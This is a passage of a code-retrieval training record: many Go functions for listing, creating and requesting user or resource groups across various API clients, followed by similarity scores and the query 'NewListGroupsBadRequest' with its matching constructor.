[]string{\"application/json\"}\n\treturn req, nil\n}", "func (client WorkloadNetworksClient) ListVMGroupsPreparer(ctx context.Context, resourceGroupName string, privateCloudName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"privateCloudName\": autorest.Encode(\"path\", privateCloudName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-07-17-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AVS/privateClouds/{privateCloudName}/workloadNetworks/default/vmGroups\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func New(client *marathon.Client) *Groups {\n\n\tif client != nil {\n\t\treturn &Groups{\n\t\t\tclient: client,\n\t\t\tgroup: &Group{},\n\t\t\tdeploy: &data.Response{},\n\t\t\tfail: &data.FailureMessage{},\n\t\t}\n\t}\n\treturn nil\n}", "func newGroup() *Group {\n\tg := new(Group)\n\tg.handlers = make([]HandlerFunc, 0)\n\treturn g\n}", "func NewGroup(client *gosip.SPClient, endpoint string, config *RequestConfig) *Group {\n\treturn &Group{\n\t\tclient: client,\n\t\tendpoint: endpoint,\n\t\tconfig: config,\n\t\tmodifiers: NewODataMods(),\n\t}\n}", "func NewGroups(r io.Reader) (groups Groups) {\n\tactive := &Group{}\n\t// Ignore possible UTF-8 byte order mark at the beginning of the\n\t// robots.txt file, just like Google does.\n\tbuffer := bufio.NewReader(r)\n\tif data, err := buffer.Peek(3); err == nil && string(data) == \"\\xef\\xbb\\xbf\" {\n\t\tbuffer.Read(data)\n\t}\n\tscanner := bufio.NewScanner(buffer)\n\tfor scanner.Scan() {\n\t\tfield, value, ignore := splitRecord(scanner.Text())\n\t\tif ignore {\n\t\t\tcontinue\n\t\t}\n\t\tswitch field {\n\t\tcase \"allow\":\n\t\t\tactive.Allow = append(active.Allow, value)\n\t\tcase \"disallow\":\n\t\t\tactive.Disallow = append(active.Disallow, value)\n\t\tcase \"crawl-delay\", \"crawldelay\":\n\t\t\tactive.CrawlDelay = value\n\t\tcase \"user-agent\", \"useragent\":\n\t\t\t// If the active group has group members, the current user-agent\n\t\t\t// record marks the start of a new group.\n\t\t\tif active.HasMembers() {\n\t\t\t\t// Only add this group if it was started with one or more\n\t\t\t\t// user-agent records.\n\t\t\t\tif active.HasUserAgents() {\n\t\t\t\t\tgroups = append(groups, active)\n\t\t\t\t}\n\t\t\t\tactive = &Group{}\n\t\t\t}\n\t\t\t// Wildcards at the end of a user-agent are superfluous since\n\t\t\t// we perform prefix matches.\n\t\t\t// The user-agent is case-insensitive.\n\t\t\tif value != \"*\" {\n\t\t\t\tvalue = strings.TrimRight(value, \"*\")\n\t\t\t\tvalue = strings.ToLower(value)\n\t\t\t}\n\t\t\tactive.UserAgents = append(active.UserAgents, value)\n\t\t}\n\t}\n\tif active.HasMembers() && active.HasUserAgents() {\n\t\tgroups = append(groups, active)\n\t}\n\treturn groups\n}", "func (a *Client) UserGroupsList(params *UserGroupsListParams, authInfo runtime.ClientAuthInfoWriter) (*UserGroupsListOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewUserGroupsListParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"user_groups_list\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v3/customer/core/user_groups/\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &UserGroupsListReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*UserGroupsListOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for user_groups_list: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/clusters\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.ep, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-06-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (ggSession *GreengrassSession) ListGroup(name string) error {\n\tvar id string\n\n\tif name != \"\" {\n\t\tlistOutput, err := ggSession.greengrass.ListGroups(&greengrass.ListGroupsInput{})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, v := range listOutput.Groups {\n\t\t\tif name == *v.Name {\n\t\t\t\tid = *v.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif id == \"\" {\n\t\t\treturn fmt.Errorf(\"group %s not found\", name)\n\t\t}\n\t} else {\n\t\tid = ggSession.config.Group.ID\n\t}\n\n\tgroup, err := ggSession.greengrass.GetGroup(&greengrass.GetGroupInput{\n\t\tGroupId: &id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group: %v\\n\", group)\n\n\tif group.LatestVersion == nil {\n\t\treturn nil\n\t}\n\n\tgroupVersion, err := ggSession.greengrass.GetGroupVersion(&greengrass.GetGroupVersionInput{\n\t\tGroupId: group.Id,\n\t\tGroupVersionId: group.LatestVersion,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group version: %v\\n\", groupVersion)\n\n\treturn nil\n}", "func (s *GroupsService) ListGroups(opt *ListGroupsOptions, options ...RequestOptionFunc) ([]*Group, *Response, error) {\n\treq, err := s.client.NewRequest(http.MethodGet, \"groups\", opt, options)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar gs []*Group\n\tresp, err := s.client.Do(req, &gs)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn gs, resp, nil\n}", "func (c *Client) Groups() (*GroupsResponse, error) {\n\tform := url.Values{}\n\tform.Add(\"format\", \"cli\")\n\n\turl := fmt.Sprintf(\"%s/account/get_groups\", c.BaseURL)\n\treq, err := http.NewRequest(\"POST\", url, strings.NewReader(form.Encode()))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(\"Content-Type\", defaultContentTypeHeader)\n\treq.Header.Add(\"Accept\", defaultAcceptHeader)\n\n\tresp, err := c.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer func() {\n\t\tif e := resp.Body.Close(); e != nil {\n\t\t\t// TODO: log event\n\t\t}\n\t}()\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar v GroupsResponse\n\terr = xml.Unmarshal(body, &v)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif len(v.ErrorMessages) > 0 {\n\t\treturn &v, errors.New(\"error listing groups\")\n\t}\n\n\treturn &v, nil\n}", "func NewGetConsistencyGroupsOK() *GetConsistencyGroupsOK {\n\treturn &GetConsistencyGroupsOK{}\n}", "func (s *EmptyStore) GroupList() (groups []*storagepb.Group, err error) {\n\treturn groups, nil\n}", "func (s *IndicesStatsService) Groups(groups ...string) *IndicesStatsService {\n\ts.groups = append(s.groups, groups...)\n\treturn s\n}", "func (o *ListNSGroupsParams) WithHTTPClient(client *http.Client) *ListNSGroupsParams {\n\to.SetHTTPClient(client)\n\treturn o\n}", "func (r *ProjectsGroupsService) List(name string) *ProjectsGroupsListCall {\n\tc := &ProjectsGroupsListCall{s: r.s, urlParams_: make(gensupport.URLParams)}\n\tc.name = name\n\treturn c\n}", "func (a *GroupsOnenoteNotebooksSectionGroupApiService) GroupsOnenoteNotebooksSectionGroupsListSectionGroups(ctx _context.Context, groupId string, notebookId string, sectionGroupId string, localVarOptionals *GroupsOnenoteNotebooksSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/notebooks({notebook-id})/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"notebook-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", notebookId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (gr *GroupResource) List(owner string) (g []*GroupDetails, err error) {\n\townerOrCurrentUser(gr, &owner)\n\n\tpath := fmt.Sprintf(\"/groups/%s/\", owner)\n\terr = gr.client.do(\"GET\", path, nil, nil, &g)\n\treturn g, nil\n}", "func (client *CassandraClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *CassandraClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/cassandraClusters\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-03-15-preview\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (o *ListNSGroupsParams) WithPageSize(pageSize *int64) *ListNSGroupsParams {\n\to.SetPageSize(pageSize)\n\treturn o\n}", "func handleGetGroups(c *Context, w http.ResponseWriter, r *http.Request) {\n\tpaging, err := parsePaging(r.URL)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse paging parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\twithInstallationCount, err := parseBool(r.URL, model.ShowInstallationCountQueryParameter, false)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse request parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tfilter := &model.GroupFilter{\n\t\tPaging: paging,\n\t\tWithInstallationCount: withInstallationCount,\n\t}\n\n\tgroups, err := c.Store.GetGroupDTOs(filter)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to query groups\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\tif groups == nil {\n\t\tgroups = []*model.GroupDTO{}\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\toutputJSON(c, w, groups)\n}", "func TestListIamGroups(t *testing.T) {\n\tt.Parallel()\n\n\tregion, err := getRandomRegion()\n\trequire.NoError(t, err)\n\n\tlocalSession, err := session.NewSession(&awsgo.Config{\n\t\tRegion: awsgo.String(region),\n\t})\n\trequire.NoError(t, err)\n\n\tgroupNames, err := getAllIamGroups(localSession, time.Now(), config.Config{})\n\trequire.NoError(t, err)\n\tassert.NotEmpty(t, groupNames)\n}", "func (client *LocalRulestacksClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *LocalRulestacksClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/PaloAltoNetworks.Cloudngfw/localRulestacks\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-08-29\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (client *MetricAlertsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *MetricAlertsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/metricAlerts\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2018-03-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (*ListGroupsRequest) Descriptor() ([]byte, []int) {\n\treturn file_api_proto_rawDescGZIP(), []int{58}\n}", "func (o *ListNSGroupsParams) WithCursor(cursor *string) *ListNSGroupsParams {\n\to.SetCursor(cursor)\n\treturn o\n}", "func NewDeleteAuthGroupsDefault(code int) *DeleteAuthGroupsDefault {\n\treturn &DeleteAuthGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *tiDBGroups) List(opts v1.ListOptions) (result *v1alpha1.TiDBGroupList, err error) {\n\tvar timeout time.Duration\n\tif opts.TimeoutSeconds != nil {\n\t\ttimeout = time.Duration(*opts.TimeoutSeconds) * time.Second\n\t}\n\tresult = &v1alpha1.TiDBGroupList{}\n\terr = c.client.Get().\n\t\tNamespace(c.ns).\n\t\tResource(\"tidbgroups\").\n\t\tVersionedParams(&opts, scheme.ParameterCodec).\n\t\tTimeout(timeout).\n\t\tDo().\n\t\tInto(result)\n\treturn\n}", "func NewListLabelGroupsPaginator(client ListLabelGroupsAPIClient, params *ListLabelGroupsInput, optFns ...func(*ListLabelGroupsPaginatorOptions)) *ListLabelGroupsPaginator {\n\tif params == nil {\n\t\tparams = &ListLabelGroupsInput{}\n\t}\n\n\toptions := ListLabelGroupsPaginatorOptions{}\n\tif params.MaxResults != nil {\n\t\toptions.Limit = *params.MaxResults\n\t}\n\n\tfor _, fn := range optFns {\n\t\tfn(&options)\n\t}\n\n\treturn &ListLabelGroupsPaginator{\n\t\toptions: options,\n\t\tclient: client,\n\t\tparams: params,\n\t\tfirstPage: true,\n\t\tnextToken: params.NextToken,\n\t}\n}", "func (a *HyperflexApiService) GetHyperflexInitiatorGroupList(ctx context.Context) ApiGetHyperflexInitiatorGroupListRequest {\n\treturn ApiGetHyperflexInitiatorGroupListRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t}\n}", "func NewDeleteCIDGroupsDefault(code int) *DeleteCIDGroupsDefault {\n\treturn &DeleteCIDGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewGroup(name string, members ...string) *Group {\n\treturn &Group{\n\t\tName: name,\n\t\tpassword: \"\",\n\t\tGID: -1,\n\t\tUserList: members,\n\t}\n}", "func (o *ListNSGroupsParams) WithContext(ctx context.Context) *ListNSGroupsParams {\n\to.SetContext(ctx)\n\treturn o\n}", "func (as *AdminServer) Groups(w http.ResponseWriter, r *http.Request) {\n\tparams := newTemplateParams(r)\n\tparams.Title = \"Users & Groups\"\n\tgetTemplate(w, \"groups\").ExecuteTemplate(w, \"base\", params)\n}", "func (_e *MockQueryCoord_Expecter) ListResourceGroups(ctx interface{}, req interface{}) *MockQueryCoord_ListResourceGroups_Call {\n\treturn &MockQueryCoord_ListResourceGroups_Call{Call: _e.mock.On(\"ListResourceGroups\", ctx, req)}\n}", "func (s *GroupsService) Create(\n\tctx context.Context,\n\tgroupName string,\n) error {\n\traw, err := json.Marshal(struct {\n\t\tGroupName string `json:\"group_name\"`\n\t}{\n\t\tgroupName,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treq, err := http.NewRequest(\n\t\thttp.MethodPost,\n\t\ts.client.url+\"2.0/groups/create\",\n\t\tbytes.NewBuffer(raw),\n\t)\n\tif err != nil {\n\t\treturn err\n\t}\n\treq = req.WithContext(ctx)\n\tres, err := s.client.client.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif res.StatusCode >= 300 || res.StatusCode <= 199 {\n\t\treturn fmt.Errorf(\n\t\t\t\"Failed to returns 2XX response: %d\", res.StatusCode)\n\t}\n\n\treturn nil\n}", "func newTiKVGroups(c *PingcapV1alpha1Client, namespace string) *tiKVGroups {\n\treturn &tiKVGroups{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}", "func (a *API) ListGroups(fields []string) ([]*Group, error) {\n\tvar resp listGroupsResponse\n\terr := a.Call(\"list_groups\", &listGroupsRequest{\n\t\tFields: fields,\n\t}, &resp)\n\n\treturn resp, err\n}", "func (e *EmailGroupService) List(opts *ListOptions) ([]EmailGroup, *Response, error) {\n\tendpoint := \"/assets/email/groups\"\n\temailGroups := new([]EmailGroup)\n\tresp, err := e.client.getRequestListDecode(endpoint, emailGroups, opts)\n\treturn *emailGroups, resp, err\n}", "func (m *MockPlacementGroupClient) List(arg0 context.Context, arg1 hcloud.PlacementGroupListOpts) ([]*hcloud.PlacementGroup, *hcloud.Response, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"List\", arg0, arg1)\n\tret0, _ := ret[0].([]*hcloud.PlacementGroup)\n\tret1, _ := ret[1].(*hcloud.Response)\n\tret2, _ := ret[2].(error)\n\treturn ret0, ret1, ret2\n}", "func NewGetUniverseGroupsOK() *GetUniverseGroupsOK {\n\treturn &GetUniverseGroupsOK{}\n}", "func (s *GroupsService) Groups(\n\tctx context.Context,\n) ([]string, error) {\n\treq, err := http.NewRequest(\n\t\thttp.MethodGet,\n\t\ts.client.url+\"2.0/groups/list\",\n\t\tnil,\n\t)\n\tif err != nil {\n\t\treturn []string{}, err\n\t}\n\treq = req.WithContext(ctx)\n\tres, err := s.client.client.Do(req)\n\tif err != nil {\n\t\treturn []string{}, err\n\t}\n\tif res.StatusCode >= 300 || res.StatusCode <= 199 {\n\t\treturn []string{}, fmt.Errorf(\n\t\t\t\"Failed to returns 2XX response: %d\", res.StatusCode)\n\t}\n\tdefer res.Body.Close()\n\tdecoder := json.NewDecoder(res.Body)\n\n\tgroupRes := struct {\n\t\tGroupNames []string `json:\"group_names\"`\n\t}{[]string{}}\n\terr = decoder.Decode(&groupRes)\n\n\treturn groupRes.GroupNames, err\n}", "func NewListGroupsForbidden() *ListGroupsForbidden {\n\treturn &ListGroupsForbidden{}\n}", "func WindowGroupNew() (*WindowGroup, error) {\n\tc := C.gtk_window_group_new()\n\tif c == nil {\n\t\treturn nil, nilPtrErr\n\t}\n\treturn wrapWindowGroup(glib.Take(unsafe.Pointer(c))), nil\n}", "func (m *MockIApi) ListPlanGroups(arg0 *chartmogul.Cursor) (*chartmogul.PlanGroups, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListPlanGroups\", arg0)\n\tret0, _ := ret[0].(*chartmogul.PlanGroups)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func newGroup(groupId string, broadcastChannelCap int64) *group {\n\n\tg := &group{\n\t\tId: groupId,\n\t\tclients: make(map[string]*socketClient),\n\t\tbroadcastChannel: make(chan interface{}, broadcastChannelCap),\n\t\tshutdownChannel: make(chan interface{}),\n\t\tdownChannel: make(chan interface{}, broadcastChannelCap),\n\t}\n\n\tAppLogger.Infof(\"[newGroup] group: %s created\", groupId)\n\treturn g\n}", "func (b *ClusterBuilder) Groups(value *GroupListBuilder) *ClusterBuilder {\n\tb.groups = value\n\tb.bitmap_ |= 2097152\n\treturn b\n}", "func newTiDBGroups(c *PingcapV1alpha1Client, namespace string) *tiDBGroups {\n\treturn &tiDBGroups{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}" ]
[ "0.6938777", "0.61539084", "0.61058784", "0.60837674", "0.6075854", "0.60570604", "0.60215706", "0.6012626", "0.60092974", "0.6003559", "0.599757", "0.59502655", "0.5944972", "0.5928773", "0.59200424", "0.5902793", "0.5882899", "0.5873967", "0.58671695", "0.5861143", "0.5815343", "0.57954234", "0.5779507", "0.57644975", "0.5719911", "0.57077056", "0.5692869", "0.56915647", "0.5681621", "0.5681621", "0.5680397", "0.5666043", "0.5665627", "0.56611323", "0.56558365", "0.5645362", "0.56410277", "0.5634732", "0.56281126", "0.56254566", "0.5619175", "0.5617065", "0.56102276", "0.5605871", "0.5592745", "0.5584613", "0.554939", "0.5547233", "0.5532629", "0.5513568", "0.5513167", "0.55072117", "0.5470641", "0.5444912", "0.5443283", "0.5442455", "0.54349005", "0.5432107", "0.5424112", "0.54114324", "0.54105866", "0.5409899", "0.5399193", "0.5390122", "0.53883475", "0.5361808", "0.53551304", "0.53551286", "0.5350901", "0.53476834", "0.53449476", "0.53361505", "0.5329527", "0.532591", "0.531846", "0.5316216", "0.5315432", "0.5291199", "0.528247", "0.5280846", "0.5280166", "0.527922", "0.5278465", "0.5268573", "0.5265381", "0.52621275", "0.5254668", "0.5243807", "0.52431405", "0.523118", "0.52308714", "0.52291065", "0.5220719", "0.5210813", "0.52089", "0.52056307", "0.51969874", "0.51819354", "0.5178992", "0.5177531" ]
0.7069612
0
NewListGroupsBadRequest creates a ListGroupsBadRequest with default headers values
func NewListGroupsBadRequest() *ListGroupsBadRequest { return &ListGroupsBadRequest{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
